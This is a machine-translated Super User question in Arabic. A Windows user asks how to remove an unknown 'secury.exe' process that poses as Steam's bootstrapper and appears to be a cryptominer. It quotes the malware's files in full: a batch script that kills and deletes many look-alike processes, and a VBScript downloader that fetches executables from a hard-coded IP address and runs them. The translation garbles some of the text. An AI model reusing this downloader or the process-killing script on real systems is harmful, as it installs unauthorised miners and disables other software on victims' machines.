windows - كيفية قتل bootstrapper العميل البخار - مستخدم سوبر

windows - كيفية قتل bootstrapper العميل البخار - مستخدم سوبر

لدي الموقف التالي في مدير المهام الخاص بي:

لا أعلم نوع التطبيق ، لكن بالتأكيد لست Steam boot bootpperpper لأنني لم أقم بتثبيته ولا يمكنني إلغاء تثبيته.

إذا حاولت معرفة نوع التطبيق ، فبواسطة هذه الخطوة:

إذا حاولت معرفة نوع التطبيق ، فبواسطة هذه الخطوة:

أرى شيئًا كهذا:

أرى شيئًا كهذا:

في الأداة المساعدة MS Config ، لم أجد أي شيء يشبه secury.exe.

عندما أقوم بفتح موقع الملف ، أرى ثلاثة ملفات:

m.bat ، b.exe ، 4.vbs.

أدناه يذهب محتوى m.bat:

taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Processkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: \ Windows \ System32 \ soiuos.exe del C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ kingsoft.exe del C: \ ProgramData \ expl0rer.exe del C: \ ProgramDataData \ ieplare.exe del C: \ ProgramData \ nssm.exe del C: \ ProgramData \ MSASCui.exe del C: \ Pro gramData \ SystemSettlngs.exe del C: \ ProgramData \ SystemSetting.exe del C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramDataData \ WindowsUpgrade.exe del C: \ ProgramData \ msdc.exe del C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe del C: \ ProgramData \ lqrtqe.exe del C: \ ProgramData \ apkls.exe del C: \ ProgramData \ winlog.exe del C: \ ProgramDataData \ svchosts.exe del C: \ ProgramData \ win1ogins.exe del C: \ ProgramData \ shovsts.exe del C: \ ProgramData \ fcty.exe del C: \ ProgramDataData \ pool.exe del C: \ ProgramData \ pool2.exe del C: \ ProgramData \ pool3.exe

وغني عن 4.vbs:

تعيين xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET" ، "http://223.68.209.7:65510/2.exe" ، 0 xPost.Send () تعيين sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe" ، 2 Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET" ، "http://223.68.209.7:65510/pool.exe" ، 0 xPost.Send () تعيين sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe" ، 2 CreateObject ("WScript.Shell"). تشغيل "C: \ ProgramData \ pool3.exe" CreateObject ( "WScript.Shell"). تشغيل "del C: \ ProgramData \ pool3.exe"

ما الذي يمكنني فعله لمنع secury.exe من إساءة استخدام صلاحيات الحوسبة الخاصة بالخادم الخاص بي؟

ملاحظة: لقد قمت بتنفيذ فحص Avast الكامل لجهاز الكمبيوتر الخاص بي ، لكنه لم يجد أي شيء خاطئ.